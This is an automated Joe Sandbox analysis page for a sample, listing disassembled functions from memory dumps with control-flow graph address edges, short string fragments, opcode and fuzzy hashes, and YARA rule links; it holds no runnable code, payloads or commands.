                                                                                      control_flow_graph 940 5ba6b40-5ba6b68 942 5ba6b6a-5ba6bb1 940->942 943 5ba6bb6-5ba6bc4 940->943 993 5ba700d-5ba7014 942->993 944 5ba6bd3 943->944 945 5ba6bc6-5ba6bd1 call 5ba3ac8 943->945 948 5ba6bd5-5ba6bdc 944->948 945->948 950 5ba6be2-5ba6be6 948->950 951 5ba6cc5-5ba6cc9 948->951 953 5ba6bec-5ba6bf0 950->953 954 5ba7015-5ba703d 950->954 955 5ba6ccb-5ba6cda call 5ba1f70 951->955 956 5ba6d1f-5ba6d29 951->956 958 5ba6c02-5ba6c60 call 5ba3808 call 5ba51f0 953->958 959 5ba6bf2-5ba6bfc 953->959 965 5ba7044-5ba706e 954->965 968 5ba6cde-5ba6ce3 955->968 960 5ba6d2b-5ba6d3a call 5ba1470 956->960 961 5ba6d62-5ba6d88 956->961 1000 5ba70d3-5ba70fd 958->1000 1001 5ba6c66-5ba6cc0 958->1001 959->958 959->965 977 5ba6d40-5ba6d5d 960->977 978 5ba7076-5ba708c 960->978 985 5ba6d8a-5ba6d93 961->985 986 5ba6d95 961->986 965->978 972 5ba6cdc 968->972 973 5ba6ce5-5ba6d1a call 5ba6608 968->973 972->968 973->993 977->993 1003 5ba7094-5ba70cc 978->1003 992 5ba6d97-5ba6dbf 985->992 986->992 1005 5ba6e90-5ba6e94 992->1005 1006 5ba6dc5-5ba6dde 992->1006 1010 5ba70ff-5ba7105 1000->1010 1011 5ba7107-5ba710d 1000->1011 1001->993 1003->1000 1012 5ba6f0e-5ba6f18 1005->1012 1013 5ba6e96-5ba6eaf 1005->1013 1006->1005 1031 5ba6de4-5ba6df3 call 5ba1408 1006->1031 1010->1011 1018 5ba710e-5ba714b 1010->1018 1015 5ba6f1a-5ba6f24 1012->1015 1016 5ba6f75-5ba6f7e 1012->1016 1013->1012 1035 5ba6eb1-5ba6ec0 call 5ba1408 1013->1035 1032 5ba6f2a-5ba6f3c 1015->1032 1033 5ba6f26-5ba6f28 1015->1033 1020 5ba6f80-5ba6fae call 5ba3000 call 5ba3020 1016->1020 1021 5ba6fb6-5ba7003 1016->1021 1020->1021 1041 5ba700b 1021->1041 1049 5ba6e0b-5ba6e20 1031->1049 1050 5ba6df5-5ba6dfb 1031->1050 1038 5ba6f3e-5ba6f40 1032->1038 1033->1038 1057 5ba6ed8-5ba6ee3 1035->1057 1058 5ba6ec2-5ba6ec8 1035->1058 1046 5ba6f6e-5ba6f73 1038->1046 1047 5ba6f42-5ba6f46 1038->1047 1041->993 1046->1015 1046->1016 1052 5ba6f48-5ba6f61 1047->1052 1053 5ba6f64-5ba6f69 call 5ba0208 1047->1053 1063 5ba6e22-5ba6e4e call 5ba2140 1049->1063 1064 5ba6e54-5ba6e5d 1049->1064 1059 5ba6dff-5ba6e01 1050->1059 1060 5ba6dfd 1050->1060 1052->1053 1053->1046 1057->1000 1069 5ba6ee9-5ba6f0c 1057->1069 1067 5ba6eca 1058->1067 1068 5ba6ecc-5ba6ece 1058->1068 1059->1049 1060->1049 1063->1003 1063->1064 1064->1000 1066 5ba6e63-5ba6e8a 1064->1066 1066->1005 1066->1031 1067->1057 1068->1057 1069->1012 1069->1035
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Hp$Hp$Hp
                                                                                      • API String ID: 0-3665545250
                                                                                      • Opcode ID: 45fcfd2bc78398af895a696ba2e2dd9ca2ab581374673627095e817812cc0b47
                                                                                      • Instruction ID: 0cae0a9a7f3b20ada48617bac0867e3e29dab39592bf7ac2a18068b7b96bf817
                                                                                      • Opcode Fuzzy Hash: 45fcfd2bc78398af895a696ba2e2dd9ca2ab581374673627095e817812cc0b47
                                                                                      • Instruction Fuzzy Hash: 4E126A72A042059FCB25DFA5C494AAEBBF2FF88300F14856DE5069B365DB31EC46CB50
                                                                                      Function 05BA8400 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1082 5ba8400-5ba843d 1084 5ba845f-5ba8475 call 5ba8208 1082->1084 1085 5ba843f-5ba8442 1082->1085 1091 5ba87eb-5ba87ff 1084->1091 1092 5ba847b-5ba8487 1084->1092 1197 5ba8444 call 5ba8d18 1085->1197 1198 5ba8444 call 5ba8d09 1085->1198 1199 5ba8444 call 5ba8d70 1085->1199 1087 5ba844a-5ba844c 1087->1084 1089 5ba844e-5ba8456 1087->1089 1089->1084 1103 5ba883f-5ba8848 1091->1103 1093 5ba85b8-5ba85bf 1092->1093 1094 5ba848d-5ba8490 1092->1094 1095 5ba86ee-5ba8728 call 5ba7c10 1093->1095 1096 5ba85c5-5ba85ce 1093->1096 1097 5ba8493-5ba849c 1094->1097 1200 5ba872b call 5baaaf8 1095->1200 1201 5ba872b call 5baaae8 1095->1201 1096->1095 1099 5ba85d4-5ba86e0 call 5ba7c10 call 5ba81a0 call 5ba7c10 1096->1099 1101 5ba84a2-5ba84b6 1097->1101 1102 5ba88e0 1097->1102 1193 5ba86eb 1099->1193 1194 5ba86e2 1099->1194 1119 5ba85a8-5ba85b2 1101->1119 1120 5ba84bc-5ba8551 call 5ba8208 * 2 call 5ba7c10 call 5ba81a0 call 5ba8248 call 5ba82f0 call 5ba8358 1101->1120 1110 5ba88e5-5ba88e9 1102->1110 1104 5ba884a-5ba8851 1103->1104 1105 5ba880d-5ba8816 1103->1105 1108 5ba889f-5ba88a6 1104->1108 1109 5ba8853-5ba8896 call 5ba7c10 1104->1109 1105->1102 1112 5ba881c-5ba882e 1105->1112 1113 5ba88cb-5ba88de 1108->1113 1114 5ba88a8-5ba88b8 1108->1114 1109->1108 1117 5ba88eb 1110->1117 1118 5ba88f4 1110->1118 1127 5ba883e 1112->1127 1128 5ba8830-5ba8835 1112->1128 1113->1110 1114->1113 1132 5ba88ba-5ba88c2 1114->1132 1117->1118 1125 5ba88f5 1118->1125 1119->1093 1119->1097 1172 5ba8553-5ba856b call 5ba82f0 call 5ba7c10 call 5ba7ec0 1120->1172 1173 5ba8570-5ba85a3 call 5ba8358 1120->1173 1125->1125 1127->1103 1195 5ba8838 call 5bab298 1128->1195 1196 5ba8838 call 5bab289 1128->1196 1132->1113 1140 5ba8731-5ba87e2 call 5ba7c10 1140->1091 1172->1173 1173->1119 1193->1095 1194->1193 1195->1127 1196->1127 1197->1087 1198->1087 1199->1087 1200->1140 1201->1140
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p$4'p$4'p
                                                                                      • API String ID: 0-3087666796
                                                                                      • Opcode ID: 216f4ab1b4adb02701203406739b0abd56c0448c4c5589734320b476072f36ab
                                                                                      • Instruction ID: 8553685423a2855e8d240e94c37e44d61377421fdf9d9e0002e5288570501830
                                                                                      • Opcode Fuzzy Hash: 216f4ab1b4adb02701203406739b0abd56c0448c4c5589734320b476072f36ab
                                                                                      • Instruction Fuzzy Hash: 45F1C935A14219DFCB08DFA4D998AADBBB2FF88300F158559E506AB365DF71EC42CB40
                                                                                      Function 05BAE108 Relevance: 4.1, Strings: 3, Instructions: 359COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1202 5bae108-5bae128 1203 5bae12e-5bae132 1202->1203 1204 5bae241-5bae266 1202->1204 1205 5bae138-5bae141 1203->1205 1206 5bae26d-5bae292 1203->1206 1204->1206 1207 5bae299-5bae2cf 1205->1207 1208 5bae147-5bae16e 1205->1208 1206->1207 1225 5bae2d6-5bae32c 1207->1225 1219 5bae236-5bae240 1208->1219 1220 5bae174-5bae176 1208->1220 1222 5bae178-5bae17b 1220->1222 1223 5bae197-5bae199 1220->1223 1224 5bae181-5bae18b 1222->1224 1222->1225 1226 5bae19c-5bae1a0 1223->1226 1224->1225 1228 5bae191-5bae195 1224->1228 1241 5bae32e-5bae342 1225->1241 1242 5bae350-5bae367 1225->1242 1229 5bae1a2-5bae1b1 1226->1229 1230 5bae201-5bae20d 1226->1230 1228->1223 1228->1226 1229->1225 1236 5bae1b7-5bae1fe call 5ba0238 1229->1236 1230->1225 1231 5bae213-5bae230 call 5ba0238 1230->1231 1231->1219 1231->1220 1236->1230 1320 5bae345 call 5bae988 1241->1320 1321 5bae345 call 5bae828 1241->1321 1322 5bae345 call 5bae822 1241->1322 1323 5bae345 call 5bae900 1241->1323 1252 5bae36d-5bae452 call 5ba8208 call 5ba7c10 call 5bad310 call 5ba7c10 call 5ba8248 call 5bac298 call 5ba7c10 call 5baaaf8 call 5ba8ab0 1242->1252 1253 5bae457-5bae467 1242->1253 1247 5bae34b 1250 5bae579-5bae584 1247->1250 1262 5bae5b3-5bae5d4 call 5ba8358 1250->1262 1263 5bae586-5bae596 1250->1263 1252->1253 1260 5bae46d-5bae546 call 5ba8208 * 2 call 5ba89c0 call 5ba7c10 call 5bad310 call 5ba7c10 call 5ba7ec0 call 5ba8358 call 5ba7c10 1253->1260 1261 5bae554-5bae570 call 5ba7c10 1253->1261 1317 5bae548 1260->1317 1318 5bae551 1260->1318 1261->1250 1276 5bae598-5bae59e 1263->1276 1277 5bae5a6-5bae5ae call 5ba8ab0 1263->1277 1276->1277 1277->1262 1317->1318 1318->1261 1320->1247 1321->1247 1322->1247 1323->1247
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (p$(p$Hp
                                                                                      • API String ID: 0-3801172158
                                                                                      • Opcode ID: 5014e76081a44f1da99675a0bfc16aa976cd8c135b1e7f454fccd6e9263c0bd5
                                                                                      • Instruction ID: 11664c69bbc49cf98e330fdc6cf0ee950b2e7790f20f3645014949f2f2623184
                                                                                      • Opcode Fuzzy Hash: 5014e76081a44f1da99675a0bfc16aa976cd8c135b1e7f454fccd6e9263c0bd5
                                                                                      • Instruction Fuzzy Hash: 9EE11E35B042099FCB04EFA4D5949ADBBB6FF89300F558569E806AB364DB30FD86CB50
                                                                                      Function 05BA9F71 Relevance: 4.0, Strings: 3, Instructions: 209COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1324 5ba9f71-5ba9fa9 1326 5ba9fab 1324->1326 1327 5ba9faf-5ba9fb5 1324->1327 1326->1327 1328 5ba9fbb-5ba9fc1 1327->1328 1329 5ba9fb7 1327->1329 1330 5ba9fc3 1328->1330 1331 5ba9fc7-5ba9fcd 1328->1331 1329->1328 1330->1331 1332 5ba9fcf-5ba9fd2 1331->1332 1333 5ba9fd4-5ba9fd8 1331->1333 1332->1333 1334 5ba9fde-5ba9fe1 1332->1334 1333->1334 1335 5baa0bb-5baa0df 1333->1335 1336 5ba9fed-5ba9ff4 1334->1336 1337 5ba9fe3-5ba9fe6 1334->1337 1348 5baa0e6-5baa10a 1335->1348 1339 5ba9ffb-5ba9fff 1336->1339 1337->1336 1338 5ba9fe8-5ba9feb 1337->1338 1338->1336 1341 5ba9ff6-5ba9ff8 1338->1341 1342 5baa00c-5baa014 1339->1342 1343 5baa001-5baa003 1339->1343 1341->1339 1345 5baa01a-5baa01f 1342->1345 1346 5baa016 1342->1346 1347 5baa009 1343->1347 1343->1348 1349 5baa111-5baa136 1345->1349 1350 5baa025-5baa031 1345->1350 1346->1345 1347->1342 1348->1349 1355 5baa13d-5baa173 1349->1355 1350->1355 1356 5baa037-5baa056 1350->1356 1371 5baa17a-5baa216 1355->1371 1367 5baa058-5baa068 1356->1367 1368 5baa0b1-5baa0b8 1356->1368 1372 5baa070-5baa07e 1367->1372 1376 5baa080-5baa090 1372->1376 1377 5baa0a7-5baa0ab 1372->1377 1376->1377 1380 5baa092-5baa0a1 1376->1380 1377->1368 1377->1371 1380->1377 1384 5baa0a3 1380->1384 1384->1377
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (p$Hp$$p
                                                                                      • API String ID: 0-2214067448
                                                                                      • Opcode ID: 2dea7f8c019e6c39f5da86759ccd5d8ad630fd0df93d39495595ef7875f1067d
                                                                                      • Instruction ID: 8c2a5055ed8ce68fe966bba594629a292c46c81f79e426eb685f7a2e8ad0502b
                                                                                      • Opcode Fuzzy Hash: 2dea7f8c019e6c39f5da86759ccd5d8ad630fd0df93d39495595ef7875f1067d
                                                                                      • Instruction Fuzzy Hash: 2271DF317086864FCB25DF79C8107AE7BF2EF85600F1446ADD946CB2A5DA34EE05CB91
                                                                                      Function 05AB0078 Relevance: 3.1, Strings: 2, Instructions: 597COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930811713.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ab0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p$4'p
                                                                                      • API String ID: 0-3973980265
                                                                                      • Opcode ID: 6d4739b0aaf085532081952b4a2963531e3a58d48383eb6252ed5e36905a1fa6
                                                                                      • Instruction ID: ed1f2e277f7fe15ce57ff0b85a26b1e164b9cf8af28a7182f8b4705341593de3
                                                                                      • Opcode Fuzzy Hash: 6d4739b0aaf085532081952b4a2963531e3a58d48383eb6252ed5e36905a1fa6
                                                                                      • Instruction Fuzzy Hash: D7027E30B042199FAB359769681CEBF689FFBC4A50B04412AD917D736ADFB0CC4187E2
                                                                                      Function 05BA24F1 Relevance: 3.0, Strings: 2, Instructions: 484COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1881 5ba24f1-5ba252c 1883 5ba252e 1881->1883 1884 5ba2535-5ba2548 call 5ba2180 1881->1884 1883->1884 1887 5ba254e-5ba2561 1884->1887 1888 5ba268c-5ba2693 1884->1888 1894 5ba256f-5ba2589 1887->1894 1895 5ba2563-5ba256a 1887->1895 1889 5ba2699-5ba26ae 1888->1889 1890 5ba292d-5ba2934 1888->1890 1901 5ba26ce-5ba26d4 1889->1901 1902 5ba26b0-5ba26b2 1889->1902 1892 5ba29a3-5ba29aa 1890->1892 1893 5ba2936-5ba293f 1890->1893 1897 5ba29b0-5ba29b9 1892->1897 1898 5ba2a46-5ba2a4d 1892->1898 1893->1892 1899 5ba2941-5ba2954 1893->1899 1919 5ba258b-5ba258e 1894->1919 1920 5ba2590-5ba259d 1894->1920 1900 5ba2685 1895->1900 1897->1898 1903 5ba29bf-5ba29d2 1897->1903 1904 5ba2a69-5ba2a6f 1898->1904 1905 5ba2a4f-5ba2a60 1898->1905 1899->1892 1915 5ba2956-5ba299b 1899->1915 1900->1888 1906 5ba26da-5ba26dc 1901->1906 1907 5ba279c-5ba27a0 1901->1907 1902->1901 1912 5ba26b4-5ba26cb 1902->1912 1926 5ba29d4-5ba29e3 1903->1926 1927 5ba29e5-5ba29e9 1903->1927 1909 5ba2a81-5ba2a8a 1904->1909 1910 5ba2a71-5ba2a77 1904->1910 1905->1904 1922 5ba2a62 1905->1922 1906->1907 1914 5ba26e2-5ba26fc 1906->1914 1907->1890 1918 5ba27a6-5ba27a8 1907->1918 1916 5ba2a79-5ba2a7f 1910->1916 1917 5ba2a8d-5ba2b02 1910->1917 1912->1901 1941 5ba2704-5ba2763 1914->1941 1915->1892 1956 5ba299d-5ba29a0 1915->1956 1916->1909 1916->1917 1990 5ba2b10 1917->1990 1991 5ba2b04-5ba2b0e 1917->1991 1918->1890 1923 5ba27ae-5ba27b7 1918->1923 1924 5ba259f-5ba25b3 1919->1924 1920->1924 1922->1904 1933 5ba290a-5ba2910 1923->1933 1924->1900 1950 5ba25b9-5ba260d 1924->1950 1926->1927 1928 5ba29eb-5ba29ed 1927->1928 1929 5ba2a09-5ba2a0b 1927->1929 1928->1929 1937 5ba29ef-5ba2a06 1928->1937 1929->1898 1938 5ba2a0d-5ba2a13 1929->1938 1939 5ba2912-5ba2921 1933->1939 1940 5ba2923 1933->1940 1937->1929 1938->1898 1943 5ba2a15-5ba2a43 1938->1943 1945 5ba2925-5ba2927 1939->1945 1940->1945 1982 5ba277a-5ba2799 1941->1982 1983 5ba2765-5ba2777 1941->1983 1943->1898 1945->1890 1948 5ba27bc-5ba27ca call 5ba1408 1945->1948 1957 5ba27cc-5ba27d2 1948->1957 1958 5ba27e2-5ba27fc 1948->1958 1992 5ba261b-5ba261f 1950->1992 1993 5ba260f-5ba2611 1950->1993 1956->1892 1963 5ba27d6-5ba27d8 1957->1963 1964 5ba27d4 1957->1964 1958->1933 1969 5ba2802-5ba2806 1958->1969 1963->1958 1964->1958 1971 5ba2808-5ba2811 1969->1971 1972 5ba2827 1969->1972 1976 5ba2818-5ba281b 1971->1976 1977 5ba2813-5ba2816 1971->1977 1975 5ba282a-5ba2844 1972->1975 1975->1933 1995 5ba284a-5ba28cb 1975->1995 1979 5ba2825 1976->1979 1977->1979 1979->1975 1982->1907 1983->1982 1996 5ba2b15-5ba2b17 1990->1996 1991->1996 1992->1900 1994 5ba2621-5ba2639 1992->1994 1993->1992 1994->1900 2002 5ba263b-5ba2647 1994->2002 2018 5ba28cd-5ba28df 1995->2018 2019 5ba28e2-5ba2908 1995->2019 1997 5ba2b19-5ba2b1c 1996->1997 1998 5ba2b1e-5ba2b23 1996->1998 2001 5ba2b29-5ba2b56 1997->2001 1998->2001 2003 5ba2649-5ba264c 2002->2003 2004 5ba2656-5ba265c 2002->2004 2003->2004 2007 5ba265e-5ba2661 2004->2007 2008 5ba2664-5ba266d 2004->2008 2007->2008 2010 5ba266f-5ba2672 2008->2010 2011 5ba267c-5ba2682 2008->2011 2010->2011 2011->1900 2018->2019 2019->1890 2019->1933
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $p$$p
                                                                                      • API String ID: 0-580715581
                                                                                      • Opcode ID: 3304c636eaa34226db60e39a6b173d5ca79c072433e5a981f390f329c737b149
                                                                                      • Instruction ID: efa39b858575429fa1cd320b8b0ec7a3fa92060b0c962fa29c3cf8c174c87c8f
                                                                                      • Opcode Fuzzy Hash: 3304c636eaa34226db60e39a6b173d5ca79c072433e5a981f390f329c737b149
                                                                                      • Instruction Fuzzy Hash: 79126D35E0461A9FCB15DFA5D854ABEBBB2FF48700F148095E801A7394DB79ED42CB90
                                                                                      Function 05BAB538 Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2022 5bab538-5bab5d9 call 5ba8920 call 5ba89c0 2033 5bab5db-5bab5e0 2022->2033 2034 5bab5e2-5bab624 call 5ba89c0 2022->2034 2035 5bab627-5bab631 2033->2035 2034->2035 2037 5bab733-5bab80f call 5bab320 call 5baaaf8 call 5ba8ab0 call 5ba8208 * 2 call 5ba8358 call 5bab320 call 5baaaf8 2035->2037 2038 5bab637-5bab72e call 5baaaf8 call 5ba7c10 call 5baaaf8 call 5ba8ab0 call 5baaaf8 2035->2038 2087 5bab84a-5bab84f 2037->2087 2088 5bab811-5bab83d 2037->2088 2038->2037 2110 5bab852 call 5bab298 2087->2110 2111 5bab852 call 5bab289 2087->2111 2088->2087 2101 5bab83f-5bab845 call 5ba7ec0 2088->2101 2090 5bab858-5bab8b5 call 5bab320 call 5baaaf8 call 5ba8248 2107 5bab8c0 2090->2107 2108 5bab8b7 2090->2108 2101->2087 2109 5bab8c1 2107->2109 2108->2107 2109->2109 2110->2090 2111->2090
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p$4'p
                                                                                      • API String ID: 0-3973980265
                                                                                      • Opcode ID: 381d40c055edc0aafacf201f78cb12d96fee97a6c29d506765814cad0f9f2f21
                                                                                      • Instruction ID: c409bfe0452e81e3964a499917994faa163ac78a23d9459f1531cca2556a1409
                                                                                      • Opcode Fuzzy Hash: 381d40c055edc0aafacf201f78cb12d96fee97a6c29d506765814cad0f9f2f21
                                                                                      • Instruction Fuzzy Hash: 7DC1A875B00218DFCB08DFA8D998AADB7B2FF89300F514159E506AB3A5DB71AC46CB50
                                                                                      Function 05BAB52A Relevance: 2.8, Strings: 2, Instructions: 269COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2112 5bab52a-5bab5d9 call 5ba8920 call 5ba89c0 2123 5bab5db-5bab5e0 2112->2123 2124 5bab5e2-5bab624 call 5ba89c0 2112->2124 2125 5bab627-5bab631 2123->2125 2124->2125 2127 5bab733-5bab80f call 5bab320 call 5baaaf8 call 5ba8ab0 call 5ba8208 * 2 call 5ba8358 call 5bab320 call 5baaaf8 2125->2127 2128 5bab637-5bab72e call 5baaaf8 call 5ba7c10 call 5baaaf8 call 5ba8ab0 call 5baaaf8 2125->2128 2177 5bab84a-5bab84f 2127->2177 2178 5bab811-5bab83d 2127->2178 2128->2127 2200 5bab852 call 5bab298 2177->2200 2201 5bab852 call 5bab289 2177->2201 2178->2177 2191 5bab83f-5bab845 call 5ba7ec0 2178->2191 2180 5bab858-5bab8b5 call 5bab320 call 5baaaf8 call 5ba8248 2197 5bab8c0 2180->2197 2198 5bab8b7 2180->2198 2191->2177 2199 5bab8c1 2197->2199 2198->2197 2199->2199 2200->2180 2201->2180
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p$4'p
                                                                                      • API String ID: 0-3973980265
                                                                                      • Opcode ID: 6fece25a7219a4a5869b2271b355dc81df496a844e9c73769fa95b070435d4d3
                                                                                      • Instruction ID: c1ac9534d21a9a7d18927cce13658c35818a4304ab656d43331db35165513010
                                                                                      • Opcode Fuzzy Hash: 6fece25a7219a4a5869b2271b355dc81df496a844e9c73769fa95b070435d4d3
                                                                                      • Instruction Fuzzy Hash: BFC1BA75B00618DFCB08DFA4D998AADB7B2FF89300F114599E506AB3A5DB71EC42CB50
                                                                                      Function 05BA1D78 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2202 5ba1d78-5ba1d8a 2203 5ba1e7b-5ba1ea0 2202->2203 2204 5ba1d90-5ba1d92 2202->2204 2206 5ba1ea7-5ba1ecb 2203->2206 2205 5ba1d98-5ba1da4 2204->2205 2204->2206 2211 5ba1db8-5ba1dc8 2205->2211 2212 5ba1da6-5ba1db2 2205->2212 2218 5ba1ed2-5ba1ef6 2206->2218 2217 5ba1dce-5ba1ddc 2211->2217 2211->2218 2212->2211 2212->2218 2222 5ba1efd-5ba1f7b 2217->2222 2223 5ba1de2-5ba1de7 2217->2223 2218->2222 2249 5ba1f82-5ba1f90 call 5ba1408 2222->2249 2258 5ba1de9 call 5ba1d78 2223->2258 2259 5ba1de9 call 5ba1d68 2223->2259 2260 5ba1de9 call 5ba1f70 2223->2260 2225 5ba1def-5ba1e29 call 5ba1b38 * 3 2241 5ba1e31-5ba1e35 2225->2241 2243 5ba1e58-5ba1e78 call 5ba0208 2241->2243 2244 5ba1e37-5ba1e50 2241->2244 2244->2243 2254 5ba1fa8-5ba1faa 2249->2254 2255 5ba1f92-5ba1f98 2249->2255 2256 5ba1f9a 2255->2256 2257 5ba1f9c-5ba1f9e 2255->2257 2256->2254 2257->2254 2258->2225 2259->2225 2260->2225
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (p$Hp
                                                                                      • API String ID: 0-3691929625
                                                                                      • Opcode ID: a6ffe90624b55885675036c01d8b46e3cc2aa02608a157590fae621e8e33a931
                                                                                      • Instruction ID: 0e61511f3373b1fbe64fe14d7e84a549baa54fca367a3904d18663f1314c96de
                                                                                      • Opcode Fuzzy Hash: a6ffe90624b55885675036c01d8b46e3cc2aa02608a157590fae621e8e33a931
                                                                                      • Instruction Fuzzy Hash: 6A51DB31B046028FC7A8AF79C444A6E77B6FFD4641B9046ADD9068B3A4DF31EC02CB94
                                                                                      Function 05BA9DE0 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2261 5ba9de0-5ba9dec 2262 5ba9e48-5ba9eab 2261->2262 2263 5ba9dee-5ba9dfe 2261->2263 2276 5ba9ead-5ba9ed0 call 5ba5770 2262->2276 2277 5ba9f27-5ba9f58 call 5ba9f71 2262->2277 2266 5ba9e2f-5ba9e47 2263->2266 2267 5ba9e00-5ba9e0c 2263->2267 2272 5ba9e0e-5ba9e24 2267->2272 2273 5ba9e25-5ba9e2e 2267->2273 2276->2277 2281 5ba9ed2-5ba9f24 2276->2281 2282 5ba9f5e-5ba9f67 2277->2282
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (p$,p
                                                                                      • API String ID: 0-2293223000
                                                                                      • Opcode ID: e307e72b7201f2daab06cb7e1a1c16657635e4ad3d84767a9528356b72b98908
                                                                                      • Instruction ID: 07e9cd58133baf6f573b3dc8f601fb0683f7a70657598f7a0e8cf243400584cd
                                                                                      • Opcode Fuzzy Hash: e307e72b7201f2daab06cb7e1a1c16657635e4ad3d84767a9528356b72b98908
                                                                                      • Instruction Fuzzy Hash: 3941B2737041596F8F028EA9AC509FF7FFAEB8C211B08406AFA55D3251CA35D9259BA0
                                                                                      Function 05AB1140 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
